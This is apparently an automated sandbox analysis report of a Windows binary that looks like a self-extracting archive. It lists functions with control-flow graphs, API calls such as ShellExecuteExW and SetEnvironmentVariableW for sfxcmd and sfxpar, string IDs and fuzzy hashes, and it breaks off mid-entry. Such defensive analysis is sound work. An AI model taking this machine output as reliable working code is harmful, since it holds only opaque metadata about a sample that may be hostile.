                control_flow_graph 561 4dd341-4dd378 call 4ee28c call 4ee360 call 4f15e8 568 4dd3ab-4dd3b4 call 4dfe56 561->568 569 4dd37a-4dd3a9 GetModuleFileNameW call 4dbc85 call 4dfe2e 561->569 573 4dd3b9-4dd3dd call 4d9619 call 4d99b0 568->573 569->573 580 4dd7a0-4dd7a6 call 4d9653 573->580 581 4dd3e3-4dd3eb 573->581 585 4dd7ab-4dd7bb 580->585 583 4dd3ed-4dd405 call 4e3781 * 2 581->583 584 4dd409-4dd438 call 4f5a90 * 2 581->584 595 4dd407 583->595 594 4dd43b-4dd43e 584->594 596 4dd56c-4dd58f call 4d9d30 call 4f35d3 594->596 597 4dd444-4dd44a call 4d9e40 594->597 595->584 596->580 606 4dd595-4dd5b0 call 4d9bf0 596->606 601 4dd44f-4dd476 call 4d9bf0 597->601 607 4dd47c-4dd484 601->607 608 4dd535-4dd538 601->608 620 4dd5b9-4dd5cc call 4f35d3 606->620 621 4dd5b2-4dd5b7 606->621 610 4dd4af-4dd4ba 607->610 611 4dd486-4dd48e 607->611 612 4dd53b-4dd55d call 4d9d30 608->612 615 4dd4bc-4dd4c8 610->615 616 4dd4e5-4dd4ed 610->616 611->610 614 4dd490-4dd4aa call 4f5ec0 611->614 612->594 631 4dd563-4dd566 612->631 637 4dd4ac 614->637 638 4dd52b-4dd533 614->638 615->616 623 4dd4ca-4dd4cf 615->623 618 4dd4ef-4dd4f7 616->618 619 4dd519-4dd51d 616->619 618->619 625 4dd4f9-4dd513 call 4f5ec0 618->625 619->608 626 4dd51f-4dd522 619->626 620->580 642 4dd5d2-4dd5ee call 4e137a call 4f35ce 620->642 627 4dd5f1-4dd5f8 621->627 623->616 630 4dd4d1-4dd4e3 call 4f5808 623->630 625->580 625->619 626->607 633 4dd5fc-4dd625 call 4dfdfb call 4f35d3 627->633 634 4dd5fa 627->634 630->616 643 4dd527 630->643 631->580 631->596 651 4dd627-4dd62e call 4f35ce 633->651 652 4dd633-4dd649 633->652 634->633 637->610 638->612 642->627 643->638 651->580 654 4dd64f-4dd65d 652->654 655 4dd731-4dd757 call 4dce72 call 4f35ce * 2 652->655 658 4dd664-4dd669 654->658 691 4dd759-4dd76f call 4e3781 * 2 655->691 692 4dd771-4dd79d call 4f5a90 * 2 655->692 660 4dd97c-4dd984 658->660 661 4dd66f-4dd678 658->661 662 4dd72b-4dd72e 660->662 663 4dd98a-4dd98e 660->663 665 4dd67a-4dd67e 661->665 666 4dd684-4dd68b 661->666 662->655 669 4dd9de-4dd9e4 663->669 670 4dd990-4dd996 663->670 665->660 665->666 667 4dd691-4dd6b6 666->667 668 4dd880-4dd891 call 4dfcbf 666->668 674 4dd6b9-4dd6de call 4f35b3 call 4f5808 667->674 693 4dd897-4dd8c0 call 4dfe56 call 4f5885 668->693 694 4dd976-4dd979 668->694 672 4dda0a-4dda2a call 4dce72 669->672 673 4dd9e6-4dd9ec 669->673 675 4dd99c-4dd9a3 670->675 676 4dd722-4dd725 670->676 696 4dda02-4dda05 672->696 673->672 679 4dd9ee-4dd9f4 673->679 710 4dd6f6 674->710 711 4dd6e0-4dd6ea 674->711 682 4dd9ca 675->682 683 4dd9a5-4dd9a8 675->683 676->658 676->662 679->676 686 4dd9fa-4dda01 679->686 695 4dd9cc-4dd9d9 682->695 689 4dd9aa-4dd9ad 683->689 690 4dd9c6-4dd9c8 683->690 686->696 698 4dd9af-4dd9b2 689->698 699 4dd9c2-4dd9c4 689->699 690->695 691->692 692->580 693->694 720 4dd8c6-4dd93c call 4e1596 call 4dfdfb call 4dfdd4 call 4dfdfb call 4f58d9 693->720 694->660 695->676 704 4dd9be-4dd9c0 698->704 705 4dd9b4-4dd9b8 698->705 699->695 704->695 705->679 712 4dd9ba-4dd9bc 705->712 717 4dd6f9-4dd6fd 710->717 711->710 716 4dd6ec-4dd6f4 711->716 712->695 716->717 717->674 721 4dd6ff-4dd706 717->721 754 4dd93e-4dd947 720->754 755 4dd94a-4dd95f 720->755 723 4dd70c-4dd71a call 4dfdfb 721->723 724 4dd7be-4dd7c1 721->724 731 4dd71f 723->731 724->668 726 4dd7c7-4dd7ce 724->726 729 4dd7d6-4dd7d7 726->729 730 4dd7d0-4dd7d4 726->730 729->726 730->729 733 4dd7d9-4dd7e7 730->733 731->676 735 4dd7e9-4dd7ec 733->735 736 4dd808-4dd830 call 4e1596 733->736 738 4dd7ee-4dd803 735->738 739 4dd805 735->739 743 4dd853-4dd85b 736->743 744 4dd832-4dd84e call 4f35e9 736->744 738->735 738->739 739->736 747 4dd85d 743->747 748 4dd862-4dd87b call 4ddd6b 743->748 744->731 747->748 748->731 754->755 756 4dd960-4dd967 755->756 757 4dd969-4dd96d 756->757 758 4dd973-4dd974 756->758 757->731 757->758 758->756
                APIs
                • __EH_prolog.LIBCMT ref: 004DD346
                • _wcschr.LIBVCRUNTIME ref: 004DD367
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,004DD328,?), ref: 004DD382
                • __fprintf_l.LIBCMT ref: 004DD873
                  • Part of subcall function 004E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004DB652,00000000,?,?,?,00010418), ref: 004E1396
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$$9P$*messages***$*messages***$@%s:$R$RTL$a
                • API String ID: 4184910265-2293854026
                • Opcode ID: 9998216ca415411f796fd84e0e68801805b4083ae7cb4190a9a74c46650d1db6
                • Instruction ID: bf6b9e719010e5825aad3b6600b9356612aa32a19995c7e8bfa86f41336818e3
                • Opcode Fuzzy Hash: 9998216ca415411f796fd84e0e68801805b4083ae7cb4190a9a74c46650d1db6
                • Instruction Fuzzy Hash: 4C12B3B1D00219AACF24DFA5DC61AEEB7B5FF04704F1044AFE605A7381D7789A45CB58
                Function 004ECB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 004EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004EAC85
                  • Part of subcall function 004EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004EAC96
                  • Part of subcall function 004EAC74: IsDialogMessageW.USER32(00010418,?), ref: 004EACAA
                  • Part of subcall function 004EAC74: TranslateMessage.USER32(?), ref: 004EACB8
                  • Part of subcall function 004EAC74: DispatchMessageW.USER32(?), ref: 004EACC2
                • GetDlgItem.USER32(00000068,0052ECB0), ref: 004ECB6E
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,004EA632,00000001,?,?,004EAECB,00504F88,0052ECB0), ref: 004ECB96
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004ECBA1
                • SendMessageW.USER32(00000000,000000C2,00000000,005035B4), ref: 004ECBAF
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004ECBC5
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004ECBDF
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004ECC23
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004ECC31
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004ECC40
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004ECC67
                • SendMessageW.USER32(00000000,000000C2,00000000,0050431C), ref: 004ECC76
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: df72ca20ff16f5a78e15cbf627a79fa4598ebe4f7bbcc8cc8cfb5e0f53db1a3f
                • Instruction ID: d2cb11482baa8db3dc1c007ca6dbb4ef7f33147351015ff8ac4e466c0838a680
                • Opcode Fuzzy Hash: df72ca20ff16f5a78e15cbf627a79fa4598ebe4f7bbcc8cc8cfb5e0f53db1a3f
                • Instruction Fuzzy Hash: 3131E171188B41BFE311DF20DC4AFAB7FACEB52709F000509F65096291DB645A0CE77A
                Function 004ECE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 795 4ece22-4ece3a call 4ee360 798 4ed08b-4ed093 795->798 799 4ece40-4ece4c call 4f35b3 795->799 799->798 802 4ece52-4ece7a call 4ef350 799->802 805 4ece7c 802->805 806 4ece84-4ece91 802->806 805->806 807 4ece95-4ece9e 806->807 808 4ece93 806->808 809 4eced6 807->809 810 4ecea0-4ecea2 807->810 808->807 812 4eceda-4ecedd 809->812 811 4eceaa-4ecead 810->811 813 4ed03c-4ed041 811->813 814 4eceb3-4ecebb 811->814 815 4ecedf-4ecee2 812->815 816 4ecee4-4ecee6 812->816 819 4ed036-4ed03a 813->819 820 4ed043 813->820 817 4ed055-4ed05d 814->817 818 4ecec1-4ecec7 814->818 815->816 821 4ecef9-4ecf0e call 4db493 815->821 816->821 822 4ecee8-4eceef 816->822 825 4ed05f-4ed061 817->825 826 4ed065-4ed06d 817->826 818->817 823 4ececd-4eced4 818->823 819->813 824 4ed048-4ed04c 819->824 820->824 830 4ecf27-4ecf32 call 4da180 821->830 831 4ecf10-4ecf1d call 4e17ac 821->831 822->821 827 4ecef1 822->827 823->809 823->811 824->817 825->826 826->812 827->821 837 4ecf4f-4ecf5c ShellExecuteExW 830->837 838 4ecf34-4ecf4b call 4db239 830->838 831->830 836 4ecf1f 831->836 836->830 840 4ed08a 837->840 841 4ecf62-4ecf6f 837->841 838->837 840->798 843 4ecf82-4ecf84 841->843 844 4ecf71-4ecf78 841->844 846 4ecf9b-4ecfba call 4ed2e6 843->846 847 4ecf86-4ecf8f 843->847 844->843 845 4ecf7a-4ecf80 844->845 845->843 848 4ecff1-4ecffd CloseHandle 845->848 846->848 863 4ecfbc-4ecfc4 846->863 847->846 855 4ecf91-4ecf99 ShowWindow 847->855 850 4ed00e-4ed01c 848->850 851 4ecfff-4ed00c call 4e17ac 848->851 853 4ed01e-4ed020 850->853 854 4ed079-4ed07b 850->854 851->850 865 4ed072 851->865 853->854 858 4ed022-4ed028 853->858 854->840 860 4ed07d-4ed07f 854->860 855->846 858->854 862 4ed02a-4ed034 858->862 860->840 864 4ed081-4ed084 ShowWindow 860->864 862->854 863->848 866 4ecfc6-4ecfd7 GetExitCodeProcess 863->866 864->840 865->854 866->848 867 4ecfd9-4ecfe3 866->867 868 4ecfea 867->868 869 4ecfe5 867->869 868->848 869->868
                APIs
                • ShellExecuteExW.SHELL32(?), ref: 004ECF54
                • ShowWindow.USER32(?,00000000), ref: 004ECF93
                • GetExitCodeProcess.KERNEL32(?,?), ref: 004ECFCF
                • CloseHandle.KERNEL32(?), ref: 004ECFF5
                • ShowWindow.USER32(?,00000001), ref: 004ED084
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                • String ID: $.exe$.inf
                • API String ID: 3686203788-2452507128
                • Opcode ID: aecda42c00f66783c36692d4660e201ea98818bd32608a001f26f37567f742db
                • Instruction ID: 0837da593374d929ade93c7397abdc2b8484b93c89f03214149e155ac609bbbd
                • Opcode Fuzzy Hash: aecda42c00f66783c36692d4660e201ea98818bd32608a001f26f37567f742db
                • Instruction Fuzzy Hash: 8C6119708043C09ADB31DF66D8546AB7BE5EF9130AF08481FF4C097390D7B9898ADB5A
                Function 004FA058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 870 4fa058-4fa071 871 4fa087-4fa08c 870->871 872 4fa073-4fa083 call 4fe6ed 870->872 874 4fa08e-4fa096 871->874 875 4fa099-4fa0bd MultiByteToWideChar 871->875 872->871 879 4fa085 872->879 874->875 877 4fa0c3-4fa0cf 875->877 878 4fa250-4fa263 call 4eec4a 875->878 880 4fa123 877->880 881 4fa0d1-4fa0e2 877->881 879->871 883 4fa125-4fa127 880->883 884 4fa0e4-4fa0f3 call 501a30 881->884 885 4fa101-4fa112 call 4f8518 881->885 888 4fa12d-4fa140 MultiByteToWideChar 883->888 889 4fa245 883->889 884->889 898 4fa0f9-4fa0ff 884->898 885->889 895 4fa118 885->895 888->889 892 4fa146-4fa158 call 4fa72c 888->892 893 4fa247-4fa24e call 4fa2c0 889->893 900 4fa15d-4fa161 892->900 893->878 899 4fa11e-4fa121 895->899 898->899 899->883 900->889 902 4fa167-4fa16e 900->902 903 4fa1a8-4fa1b4 902->903 904 4fa170-4fa175 902->904 905 4fa1b6-4fa1c7 903->905 906 4fa200 903->906 904->893 907 4fa17b-4fa17d 904->907 908 4fa1c9-4fa1d8 call 501a30 905->908 909 4fa1e2-4fa1f3 call 4f8518 905->909 910 4fa202-4fa204 906->910 907->889 911 4fa183-4fa19d call 4fa72c 907->911 914 4fa23e-4fa244 call 4fa2c0 908->914 924 4fa1da-4fa1e0 908->924 909->914 926 4fa1f5 909->926 910->914 915 4fa206-4fa21f call 4fa72c 910->915 911->893 923 4fa1a3 911->923 914->889 915->914 927 4fa221-4fa228 915->927 923->889 928 4fa1fb-4fa1fe 924->928 926->928 929 4fa22a-4fa22b 927->929 930 4fa264-4fa26a 927->930 928->910 931 4fa22c-4fa23c WideCharToMultiByte 929->931 930->931 931->914 932 4fa26c-4fa273 call 4fa2c0 931->932 932->893
                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004F4E35,004F4E35,?,?,?,004FA2A9,00000001,00000001,3FE85006), ref: 004FA0B2
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004FA2A9,00000001,00000001,3FE85006,?,?,?), ref: 004FA138
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004FA232
                • __freea.LIBCMT ref: 004FA23F
                  • Part of subcall function 004F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                • __freea.LIBCMT ref: 004FA248
                • __freea.LIBCMT ref: 004FA26D
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 6d5b2c4eaaa8a3a60cf1b1e21aea874a1bd4c93c967179896188fda356deee56
                • Instruction ID: 25edb09e32ad25399a5d53c813955a8b440b7324e87f406eb19f51fef9c9e765
                • Opcode Fuzzy Hash: 6d5b2c4eaaa8a3a60cf1b1e21aea874a1bd4c93c967179896188fda356deee56
                • Instruction Fuzzy Hash: 865128B270020AAFDB248F60CC41EBF77A9EB40754F16426AFE08D6340DB39DC60C65A
                Function 004EA335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 004E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004E00A0
                  • Part of subcall function 004E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004DEB86,Crypt32.dll,00000000,004DEC0A,?,?,004DEBEC,?,?,?), ref: 004E00C2
                • OleInitialize.OLE32(00000000), ref: 004EA34E
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004EA385
                • SHGetMalloc.SHELL32(00518430), ref: 004EA38F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll$3vo
                • API String ID: 3498096277-646756056
                • Opcode ID: eb9f933bd5634451b0e726ea515032bade21613097ece8e76cc0cc5931563cf5
                • Instruction ID: 15de3df40ff73f99dc751eafedbfd1f15611a4dc5e35ec064f1dd566ec852dc2
                • Opcode Fuzzy Hash: eb9f933bd5634451b0e726ea515032bade21613097ece8e76cc0cc5931563cf5
                • Instruction Fuzzy Hash: 4BF0FFB1D00209ABDB10AF9AD8499EFFFFCEF95705F00415AE914E2240DBB45649CFA1
                Function 004D99B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 939 4d99b0-4d99d1 call 4ee360 942 4d99dc 939->942 943 4d99d3-4d99d6 939->943 945 4d99de-4d99fb 942->945 943->942 944 4d99d8-4d99da 943->944 944->945 946 4d99fd 945->946 947 4d9a03-4d9a0d 945->947 946->947 948 4d9a0f 947->948 949 4d9a12-4d9a31 call 4d70bf 947->949 948->949 952 4d9a39-4d9a57 CreateFileW 949->952 953 4d9a33 949->953 954 4d9a59-4d9a7b GetLastError call 4db66c 952->954 955 4d9abb-4d9ac0 952->955 953->952 964 4d9a7d-4d9a9f CreateFileW GetLastError 954->964 965 4d9aaa-4d9aaf 954->965 957 4d9ae1-4d9af5 955->957 958 4d9ac2-4d9ac5 955->958 960 4d9af7-4d9b0f call 4dfe56 957->960 961 4d9b13-4d9b1e 957->961 958->957 959 4d9ac7-4d9adb SetFileTime 958->959 959->957 960->961 967 4d9aa5-4d9aa8 964->967 968 4d9aa1 964->968 965->955 969 4d9ab1 965->969 967->955 967->965 968->967 969->955
                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,004D78AD,?,00000005,?,00000011), ref: 004D9A4C
                • GetLastError.KERNEL32(?,?,004D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004D9A59
                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,004D78AD,?,00000005,?), ref: 004D9A8E
                • GetLastError.KERNEL32(?,?,004D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004D9A96
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,004D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004D9ADB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: 4cceb010ef4f3c9ec4e3a025c8df30c5458650e284499845f0855aec91100e80
                • Instruction ID: 0e408a85887a11a77ce2a5d67c2aec8e13372b952bb2f03e27b80a5bbe6dc93f
                • Opcode Fuzzy Hash: 4cceb010ef4f3c9ec4e3a025c8df30c5458650e284499845f0855aec91100e80
                • Instruction Fuzzy Hash: D24144715447866FE7209B20CC19BDBBBD4BB01324F10071BF9A4D23D0E778AD888B99
                Function 004EAC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 998 4eac74-4eac8d PeekMessageW 999 4eac8f-4eaca3 GetMessageW 998->999 1000 4eacc8-4eaccc 998->1000 1001 4eacb4-4eacc2 TranslateMessage DispatchMessageW 999->1001 1002 4eaca5-4eacb2 IsDialogMessageW 999->1002 1001->1000 1002->1000 1002->1001
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004EAC85
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004EAC96
                • IsDialogMessageW.USER32(00010418,?), ref: 004EACAA
                • TranslateMessage.USER32(?), ref: 004EACB8
                • DispatchMessageW.USER32(?), ref: 004EACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: 6e31b63923e7c6279c5fb6aeedb7b0e364ecdb3c37379c875eaf5f143905ea88
                • Instruction ID: bd7518d3f97c0d1281c9ecab26545a622208638664c5b1c2636a035bcccf1864
                • Opcode Fuzzy Hash: 6e31b63923e7c6279c5fb6aeedb7b0e364ecdb3c37379c875eaf5f143905ea88
                • Instruction Fuzzy Hash: BCF01D71902129AB8B249BE2AC4CDEB7F6CEF15251B404415F405D3210EB28E40DD7B1
                Function 004EA2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1003 4ea2c7-4ea2e6 GetClassNameW 1004 4ea30e-4ea310 1003->1004 1005 4ea2e8-4ea2fd call 4e17ac 1003->1005 1007 4ea31b-4ea31f 1004->1007 1008 4ea312-4ea315 SHAutoComplete 1004->1008 1010 4ea2ff-4ea30b FindWindowExW 1005->1010 1011 4ea30d 1005->1011 1008->1007 1010->1011 1011->1004
                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 004EA2DE
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 004EA315
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 004EA305
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT
                • API String ID: 4243998846-3080729518
                • Opcode ID: a9d116d2aebf566a2d23bb6ecaa1c9f4531d6de311d251198ec74c9a9eebf041
                • Instruction ID: 3c7598f7319c830a46de7829745a8ade80eea17146c279da5492e90f027b77e5
                • Opcode Fuzzy Hash: a9d116d2aebf566a2d23bb6ecaa1c9f4531d6de311d251198ec74c9a9eebf041
                • Instruction Fuzzy Hash: 5EF02732A0162877E7305626AC0DFDB77AC9F46B02F040057BE04E3280D764AD59C6FA
                Function 004ED287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1012 4ed287-4ed2b2 call 4ee360 SetEnvironmentVariableW call 4dfbd8 1016 4ed2b7-4ed2bb 1012->1016 1017 4ed2df-4ed2e3 1016->1017 1018 4ed2bd-4ed2c1 1016->1018 1019 4ed2ca-4ed2d1 call 4dfcf1 1018->1019 1022 4ed2c3-4ed2c9 1019->1022 1023 4ed2d3-4ed2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1017
                APIs
                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ED29D
                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ED2D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
